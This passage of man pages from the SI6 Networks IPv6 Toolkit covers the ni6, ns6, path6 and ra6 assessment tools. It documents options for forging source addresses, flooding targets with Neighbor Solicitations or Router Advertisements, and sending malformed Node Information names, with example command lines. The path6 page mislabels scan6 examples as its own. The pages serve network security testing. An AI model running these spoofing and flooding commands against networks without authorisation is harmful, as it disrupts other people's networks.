destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If an IPv6 prefix is specified, the IPv6 Source Address of the ICMPv6 packets will be randomized from the specified prefix. Note: When operating in "listening" mode, the Source Address is automatically selected depending on the IPv6 Destination Address of the ICMPv6 NI Query (unless a specific IPv6 Source Address has been specified with the "\-s" option). .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. It can be left unspecified only if the "\-L" option is selected (i.e., if the tool is to operate in "listening" mode). Note: When operating in "listening" mode, the Destination Address is automatically set to the Source Address of the incoming ICMPv6 NI Query message. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit to be used for the IPv6 packets. It is randomized by default. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the TCP segments. If left unspecified, the link\-layer Source Address is set to the real link\-layer address of the network interface. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the ICMPv6 NI packets. By default, the link\-layer Destination Address is automatically set to the link\-layer address of the destination host (for on-link destinations) or to the link\-layer of the first-hop router. .TP \-\-payload\-size, \-P This options specifies the size (in bytes) of the ICMPv6 NI payload. .TP \-\-subject\-ipv6, \-6 This option specifies an IPv6 Address to be used as the Subject of ICMPv6 Node Information Query messages. .TP \-\-subject\-ipv4, \-4 This option specifies an IPv4 Address to be used as the Subject of ICMPv6 Node Information Query messages. .TP \-\-subject\-name, \-n This option specifies a Name to be used as the Subject of ICMPv6 Node Information Query messages. By default, the specified name is considered to be a Fully-Qualified Domain Name (FQDN). Please consult the "\-\-sname\-slabel" option for instructions on how to specify "single-label" names. .TP \-\-subject\-fname, \-N This option instructs the ni6 tool to set the Subject of ICMPv6 NI Query messages to a forged name of the specified length. Note: The forged name is a sequence of labels of 'a' characters, with the maximum label size being specified by means of the "\-\-max\-label\-size" option. .TP \-\-subject\-ename, \-x This option instructs the ni6 tool to set the Subject of an ICMPv6 NI Query message to a malformed label of the specified length. This option is useful for including a malformed label that "spans past the end of the ICMPv6 NI Query". .TP \-\-subject\-nloop, \-O This option specifies that the Data field should be set to a Name that contains a DNS compression loop. The loop type is specified with this option, with valid values being in the range 0\-1. .TP \-\-sname\-slabel, \-e This option specifies that the specified Subject Name is a single-label name, and hence should be terminated with two (rather than one) NULL labels. .TP \-\-max\-label\-size, \-Z This option specifies the maximum Name label size. It defaults to 63. .TP \-\-code, \-C This option specified the ICMPv6 code. For ICMPv6 NI Query messages, if specific Subject type is specified, the ICMPv6 code is automatically set to the corresponding value. .TP \-\-qtype, \-q This option specifies the Qtype value of ICMPv6 NI messages. For ICMPv6 NI Reply messages, if specific Data type is specified, the ICMPv6 Qtype is automatically set to the corresponding value. .TP \-\-flags, \-X This option specified the "Flags" field of the ICMPv6 NI messages. For ICMPv6 NI Query messages of Qtype 3 (Node IPv6 Addresses), the "Flags" field defaults to "GSLCA". For ICMPv6 NI Query messages of Qtype 4 (Node IPv4 Addresses), the "Flags" field defaults to "A". For other ICMPv6 NI Query messages it defaults to 0. For ICMPv6 Reply messages, the "Flags" field is copied from the corresponding ICMPv6 NI Query message. .TP \-\-data\-ipv6, \-w This option specifies an IPv6 Address to be used as the Data of ICMPv6 Node Information Reply messages. .TP \-\-data\-ipv4, \-W This option specifies an IPv4 Address to be used as the Data of ICMPv6 Node Information Reply messages. .TP \-\-data\-name, \-a This option specifies a Name to be used as the Data of ICMPv6 Node Information Reply messages. By default, the specified name is considered to be a Fully-Qualified Domain Name (FQDN). Please consult the "\-\-dname\-slabel" option for instructions on how to specify "single-label" names. .TP \-\-data\-fname, \-A This option instructs the ni6 tool to set the Data of the ICMPv6 NI Reply messages to a forged name of the specified length. Note: The forged name is a sequence of labels of 'a' characters, with the maximum label size being specified by means of the "\-\-max\-label\-size" option. .TP \-\-data\-ename, \-Q This option instructs the ni6 tool to set the Data of ICMPv6 NI Reply messages to a malformed label of the specified length. This option is useful for including a malformed label that "spans past the end of the ICMPv6 NI Reply". .TP \-\-data\-nloop, \-O This option specifies that the Data field should be set to a Name that contains a DNS compression loop. The loop type is specified with this option, with valid values being in the range 0\-2. .TP \-\-dname\-slabel, \-E This option specifies that the specified Data Name is a single\-label name, and hence should be terminated with two (rather than one) NULL labels. .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming Neighbor Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ SRC_ADDR ,\ \-\-block\-link\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-K\ DST_ADDR ,\ \-\-block\-link\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ SRC_ADDR ,\ \-\-accept\-link\-src\ SRC_ADDR This option sets an accept filter for the incoming Neighbor Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-G\ DST_ADDR ,\ \-\-accept\-link\-dst\ DST_ADDR This option sets an accept filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-forge\-src\-addr, \-r This option instructs the ni6 tool to forge the IPv6 Source Address of ICMPv6 NI messages. Note that when operating in listening mode, unless this tool is set, ni6 will not impersonate other nodes. .TP \-\-forge\-link\-src\-addr, \-R This option instructs the ni6 tool to forge the link\-layer Source Address of ICMPv6 NI messages. Note: Some interface cards (or their corresponding drivers) may silently discard packets that contain a forged link\-layer Source Address. .TP \-\-loop, \-l This option instructs the tcp6 tool to send periodic TCP segments to the victim node. The amount of time to pause between sending TCP segments can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending ICMPv6 Node Information Query messages (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP \-\-listen, \-L This instructs the ni6 tool to operate in listening mode (possibly after attacking a specified target). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP \-\-verbose, \-v This option instructs the ni6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been discarded as a result of applying the specified filters. .TP \-\-help, \-h Print help information for the ni6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B ni6 tool. \fBExample #1\fR # ni6 \-i eth0 \-\-subject\-ipv6 ff02::1 \-d ff02::1 \-q 2 \-v Send an ICMPv6 Node Information Query to the multicast address ff02::1 ("\-d" option), with a Subject IPv6 Address of "ff02::1" ("\-\-subject\-ipv6" option), querying for Node names ("\-q" option). Be verbose. \fBExample #2\fR # ni6 \-i eth0 \-\-data\-fname 1000 \-L \-\-forge\-src\-addr \-v Listen to incoming ICMPv6 Node Information Query messages querying for node names, and respond with ICMPv6 NI Reply messages that contain a forged name of 700 bytes. Forge the IPv6 Source Address of the packets. Be verbose. .SH AUTHOR The .B ni6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/ns6.1000066400000000000000000000237031254360455000166470ustar00rootroot00000000000000.TH NS6 1 .SH NAME ns6 \- A security assessment tool for attack vectors based on ICMPv6 Neighbor Solicitation messages .SH SYNOPSIS .B ns6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-E LINK_ADDR] [\-e] [\-t TARGET_ADDR[/LEN]] [\-F N_SOURCES] [\-T N_TARGETS] [\-z SECONDS] [\-l] [\-v] [\-h] .SH DESCRIPTION .B ns6 allows the assessment of IPv6 implementations with respect to a variety of attacks based on ICMPv6 Neighbor Solicitation messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. .SH OPTIONS .B ns6 The ns6 tool takes its parameters by means of command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options) to be conveyed into the Neighbor Solicitations, it may be necessary for the ns6 tool to split that information into more than one Neighbor Solicitation message. Also, when the ns6 tool is instructed to flood the victim with Neighbor Solicitations from different sources ("\-\-flood\-sources" option), multiple packets may need to be sent. ns6 supports IPv6 fragmentation, which may be of use if a large amount of information needs to be conveyed within a single Neighbor Solicitation message. IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option is meant to specify the IPv6 Source Address to be used for the Neighbor Solicitation messages. If left unspecified, a randomized link-local (fe80::/64) address is selected. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the Neighbor Solicitation messages. If this option is left unspecified, but the Ethernet Destination Address is specified, the "all-nodes link-local multicast" address (ff02::1) is selected as the IPv6 Destination Address. .TP \-\-hop\-limit, \-A This option specifies the IPv6 Hop Limit to be used for the Neighbor Solicitation messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Neighbor Solicitation messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the Neighbor Solicitation messages (currently, only Ethernet is supported). If left unspecified, the link\-layer Source Address is randomized. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the Neighbor Solicitation messages (currently, only Ethernet is supported). If left unspecified, it is set to the address "33:33:00:00:00:01" (the Ethernet address corresponding to the "all-nodes link-local multicast" IPv6 address (ff02::1). .TP \-\-target, \-t This option specifies the IPv6 Target Address of the Neighbor Solicitation messages. If the "\-T" ("\-\-flood\-targets") option is specified, this option specifies an IPv6 prefix in the form "\-t prefix/prefixlen". See the description of the "\-T" option for further information on how the "\-t" option is processed in that specific case. .TP \-\-source\-lla\-opt, \-E This option specifies the contents of a source link\-layer address option to be included in the Neighbor Solicitation messages. If more than one source link\-layer address is specified (by means of multiple "\-E" options), and all the resulting options cannot be conveyed into a single Neighbor Solicitation, multiple Neighbor Solicitations will be sent as needed. .TP \-\-add\-slla\-opt, \-e This option instructs the ns6 tool to include a source link\-layer address option in the Neighbor Solicitation messages that it sends. The link\-layer address included in the option is the same as the Ethernet Source Address used for the outgoing Neighbor Solicitation messages. .TP \-\-flood\-sources, \-F This option instructs the ns6 tool to send Neighbor Solicitations from multiple (and random) IPv6 Source Addresses. The number of different sources is specified as "\-F number". The IPv6 Source Address of the packets are randomly selected from the prefix specified by the "\-s" option (which defaults to fe80::/64). .TP \-\-flood\-targets, \-T This option instructs the ns6 tool to send Neighbor Solicitation messages for multiple Target Addresses. The number of different Target Addresses is specified as "\-T number". The Target Address of each packet is randomly selected from the prefix ::/64, unless a different prefix has been specified by means of the "\-t" option. .TP \-\-loop, \-l This option instructs the ns6 tool to send periodic Neighbor Solicitations to the victim. The amount of time to pause between sending Neighbor Solicitations can be specified by means of the "\-z" option, and defaults to 1 second. .TP \-\-sleep, \-z This option instructs the ns6 tool to the amount of time to pause between sending Neighbor Solicitations. If left unspecified, it defaults to 1 second. .TP \-\-verbose, \-v This option instructs the ns6 tool to be verbose. .TP \-\-help, \-h Print help information for the ns6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B ns6 tool. \fBExample #1\fR # ns6 \-i eth0 \-d fe80::01 \-t 2001:db8::1 \-e Use the network interface "eth0" to send a Neighbor Solicitation message using a random link-local unicast IPv6 Source Address and a random Ethernet Source Address, to the IPv6 Destination address fe80::1 and the Ethernet Destination Address 33:33:00:00:00:01 (selected by default). The target of the Neighbor Advertisement is 2001:db8::1. The Neighbor Solicitation also includes a source link\-layer address option, that contains the same Ethernet address as that used for the Ethernet Source Address of the packet. \fBExample #2\fR # ns6 \-i eth0 \-s 2001:db8::/32 \-t 2001:db8::1 \-F 10 \-l \-z 10 \-e \-v Send 10 Neighbor Solicitation messages using random Ethernet Source Addresses and random IPv6 Source Addresses from the prefix 2001:db8::/32, to the Ethernet Destination Address 33:33:00:00:00:01 (default) and the IPv6 Destination Address ff02::1 (default). The IPv6 Target Address of the Neighbor Solicitation is 2001:db8::1, and each message includes a source link\-layer address option that contains the same address as that used for the Ethernet Source Address of the packet. Repeat this operation every ten seconds. Be verbose. \fBExample #3\fR # ns6 \-i eth0 \-s 2001:db8::/32 \-t 2001:db8::1 \-F 10 \-l \-z 10 \-E ff:ff:ff:ff:ff:ff \-v Send 10 Neighbor Solicitation messages using random Ethernet Source Addresses and random IPv6 Source Addresses from the prefix fe80::/64 (default, link-local unicast), to the Ethernet Destination Address 33:33:00:00:00:01 (default) and the IPv6 Destination Address ff02:1 (default). The IPv6 Target Address of the Neighbor Solicitation is 2001:db8::1, and each message includes a source link\-layer address option that contains the Ethernet address ff:ff:ff:ff:ff:ff. Repeat this operation every ten seconds. Be verbose. .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B ns6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/path6.1000066400000000000000000000162051254360455000171620ustar00rootroot00000000000000.TH PATH6 1 .SH NAME path6 \- A versatile IPv6\-based traceroute tool .SH SYNOPSIS .B path6 .RB [\| \-d \|] .RB [\| \-i .IR INTERFACE \|] .RB [\| \-s .IR SRC_ADDR \|[/\| LEN \|]] .RB [\| \-S .IR LINK_SRC_ADDR \|] .RB [\| \-D .IR LINK_DST_ADDR \|] .RB [\| \-y .IR FRAG_SIZE \|] .RB [\| \-u .IR DST_OPT_HDR_SIZE \|] .RB [\| \-U .IR DST_OPT_U_HDR_SIZE \|] .RB [\| \-H .IR HBH_OPT_HDR_SIZE \|] .RB [\| \-r .IR LIMIT \|] .RB [\| \-p .IR PROBE_TYPE \|] .RB [\| \-P .IR PAYLOAD_SIZE \|] .RB [\| \-a .IR DST_PORT \|] .RB [\| \-X .IR TCP_FLAGS \|] .RB [\| \-v \|] .RB [\| \-h \|] .SH DESCRIPTION .B path6 is an IPv6 traceroute tool, with full support for IPv6 Extension Headers. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. .SH OPTIONS .B path6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Most of probe packet details can be specified by means of the available options. When TCP or UDP probe packets are employed, the Source Port of the probe packets is used to encode the probe packet number. The current version of the tool will only print IPv6 addresses and will not try to reverse\-map such IPv6 addresses into hostnames. .TP .BI \-i\ interface ,\ \-\-interface\ interface This option specifies the network interface to be used by the .B path6 tool. It can be used for overriding the output interface selected based on the local routing table. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If a prefix is specified, the Source Address is randomly selected from that prefix. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the target. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option can be used to override the link\-layer Source Address of the packets. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option can be used to override the link\-layer Destination Address of the outgoing packets. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the probe packets must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the outgoing packet(s). The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop-by-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-p\ PROBE_TYPE ,\ \-\-probe\-type\ PROBE_TYPE This option specifies the protocol to be used for the probe packets. Possible arguments are: "icmp" (for ICMPv6 Echo Request), "tcp" (for TCP), and "udp" (for UDP). If left unspecified, the probe packets default to ICMPv6 Echo Request. .TP .BI \-P\ PAYLOAD_SIZE ,\ \-\-payload\-size\ PAYLOAD_SIZE This option specifies the payload size of the probe packets. .TP .BI \-o\ SRC_PORT ,\ \-\-src\-port\ SRC_PORT This option specifies the TCP/UDP Source Port. If left unspecified, the Source Port is randomized from the range 1024\-65535. .TP .BI \-a\ DST_PORT ,\ \-\-dst\-port\ DST_PORT This option specifies the TCP/UDP Destination Port. If left unspecified, the Destination Port defaults to 80 for the TCP case, and a randomized value (in the range 60000\-65000) for the UDP case. .TP .BI \-X\ TCP_FLAGS ,\ \-\-tcp\-flags\ TCP_FLAGS This option is used to set specific the TCP flags. The flags are specified as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), "U" (URG), "X" (no flags). If this option is left unspecified, the ACK bit is set on all probe packets. .TP .BR \-v\| ,\ \-\-verbose This option selects the "verbosity" of the tool. If this option is left unspecified, only minimum information is printed. .TP .BR \-h\| ,\ \-\-help Print help information for the .B path6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B path6 tool. \fBExample #1\fR # scan6 \-i eth0 \-L \-e \-v Perform host scanning on the local network ("\-L" option) using interface "eth0" ("\-i" option). Use both ICMPv6 echo requests and unrecognized IPv6 options of type 10xxxxxx (default). Print link-link layer addresses along with IPv6 addresses ("\-e" option). Be verbose ("\-v" option). \fBExample #2\fR # scan6 \-d 2001:db8::/64 \-\-tgt\-virtual\-machines all \-\-ipv4\-host 10.10.10.0/24 Scan for virtual machines (both VirtualBox and vmware) in the prefix 2001:db8::/64. The additional information about the IPv4 prefix employed by the host system is leveraged to reduce the search space. \fBExample #3\fR # scan6 \-d 2001:db8::/64 \-\-tgt\-ipv4\-embedded ipv4\-32 \-\-ipv4\-host 10.10.10.0/24 Scan for IPv6 addresses of the network 2001:db8::/64 that embed the IPv4 prefix 10.10.10.0/24 (with the 32-bit encoding). \fBExample #4\fR # scan6 \-d 2001:db8:0\-500:0\-1000 Scan for IPv6 addresses of the network 2001:db8::/64, varying the two lowest order 16\-bit words of the addresses in the range 0\-500 and 0\-1000, respectively. \fBExample #5\fR # scan6 \-d fc00::/64 \-\-tgt\-vendor 'Dell Inc' \-p tcp Scan for network devices manufactured by 'Dell Inc' in the target prefix fc00::/64. The tool will employ TCP segments as the probe packets (rather than the default ICMPv6 echo requests). .SH SEE ALSO .BR ipv6toolkit.conf (5) draft\-ietf\-opsec\-ipv6\-host\-scanning (available at: .IR ) for a discussion of support of IPv6 packets with extension headers in the IPv6 Internet. .SH AUTHOR The .B path6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2014\-2015 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/ra6.1000066400000000000000000000646401254360455000166360ustar00rootroot00000000000000.TH RA6 1 .SH NAME ra6 \- A security assessment tool for attack vectors based on ICMPv6 Router Advertisement messages .SH SYNOPSIS .B ra6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-S LINK_SRC_ADDR] [\-D LINK_DST_ADDR] [\-c CUR_HOP] [\-t ROUTER_LIFETIME] [\-r REACHABLE_TIME] [\-x RETRANS_TIMER] [\-m] [\-o] [\-a] [\-q] [\-p PREFERENCE] [\-E LINK_ADDR] [\-e] [\-P PREFIX/LEN[#FLAGS[#VALID[#PREFERRED]]]] [\-M MTU] [\-N [LIFETIME[#DNS_ADDR]]] [\-R PREFIX/LEN[#PREF[#LIFETIME]]] [\-f N_PREFIXES] [\-F N_SOURCES] [\-w N_ROUTES] [\-W N_ADDRS[#ADDRSPEROPT]] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-L] [\-v] [\-h] .SH DESCRIPTION .B ra6 allows the assessment of IPv6 implementations with respect to a variety of attacks based on ICMPv6 Router Advertisement messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. This tool has two modes of operation: active and passive. In active mode, the tool attacks a specific target, while in passive mode the tool listens to traffic on the local network, and launches an attack in response to such traffic. Active mode is employed when an Ethernet destination address and/or an IPv6 destination address are specified. Passive mode is employed when the "\-L" option (or its long variant "\-\-listen") is specified. In passive mode, the ra6 tool listens for incoming Router Solicitation messages and responds with the Router Advertisement attack messages. If both a destination address and the "\-L" option are specified, the tool firstly employs active mode to attack the specified target, and then enters passive mode to respond to Router Solicitation messages with Router Advertisement attack packets. .SH OPTIONS .B ra6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options and option data) to be conveyed into the Router Advertisements, it may be necessary for ra6 to split that information into more than one Router Advertisement message. This may be particularly the case when the "flood-prefixes", "\-\-flood\-routes", or "\-\-flood\-dns" options are used. Also, when the ra6 tool is instructed to flood the victim with Router Advertisements from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. ra6 supports IPv6 fragmentation, which may be of use if a large amount of information needs to be conveyed within a single Router Advertisement message. IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. The tool supports filtering of incoming Router Solicitation messages based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming Router Solicitation message matches any of those filters, the message is discarded (and thus no Router Advertisements are sent in response). If any "accept filter" is specified, incoming Router Solicitation messages must match the specified filters in order for the ra6 tool to respond with Router Advertisement messages. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 Source Address (or IPv6 prefix) to be used for the Router Advertisement messages. If left unspecified, a randomized link-local unicast (fe80::/64) address is selected. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This specifies the IPv6 Destination Address of the Router Advertisement messages. If this option is left unspecified, but the Ethernet Destination Address is specified, the "all-nodes link-local multicast" address (ff02::1) is selected as the IPv6 Destination Address. When operating in passive mode ("\-L" option), the IPv6 Destination Address is selected according to the IPv6 Source Address of the Router Solicitation message. If the IPv6 Source Address of the Router Solicitation is the unspecified address (::), the "all-nodes link-local multicast" address (ff02::1) is used as the IPv6 Destination Address. Otherwise, the IPv6 Source Address of the incoming Router Solicitation message is used as the IPv6 Destination Address of the outgoing Router Advertisement messages. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit of the Router Advertisement messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Router Advertisement messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). 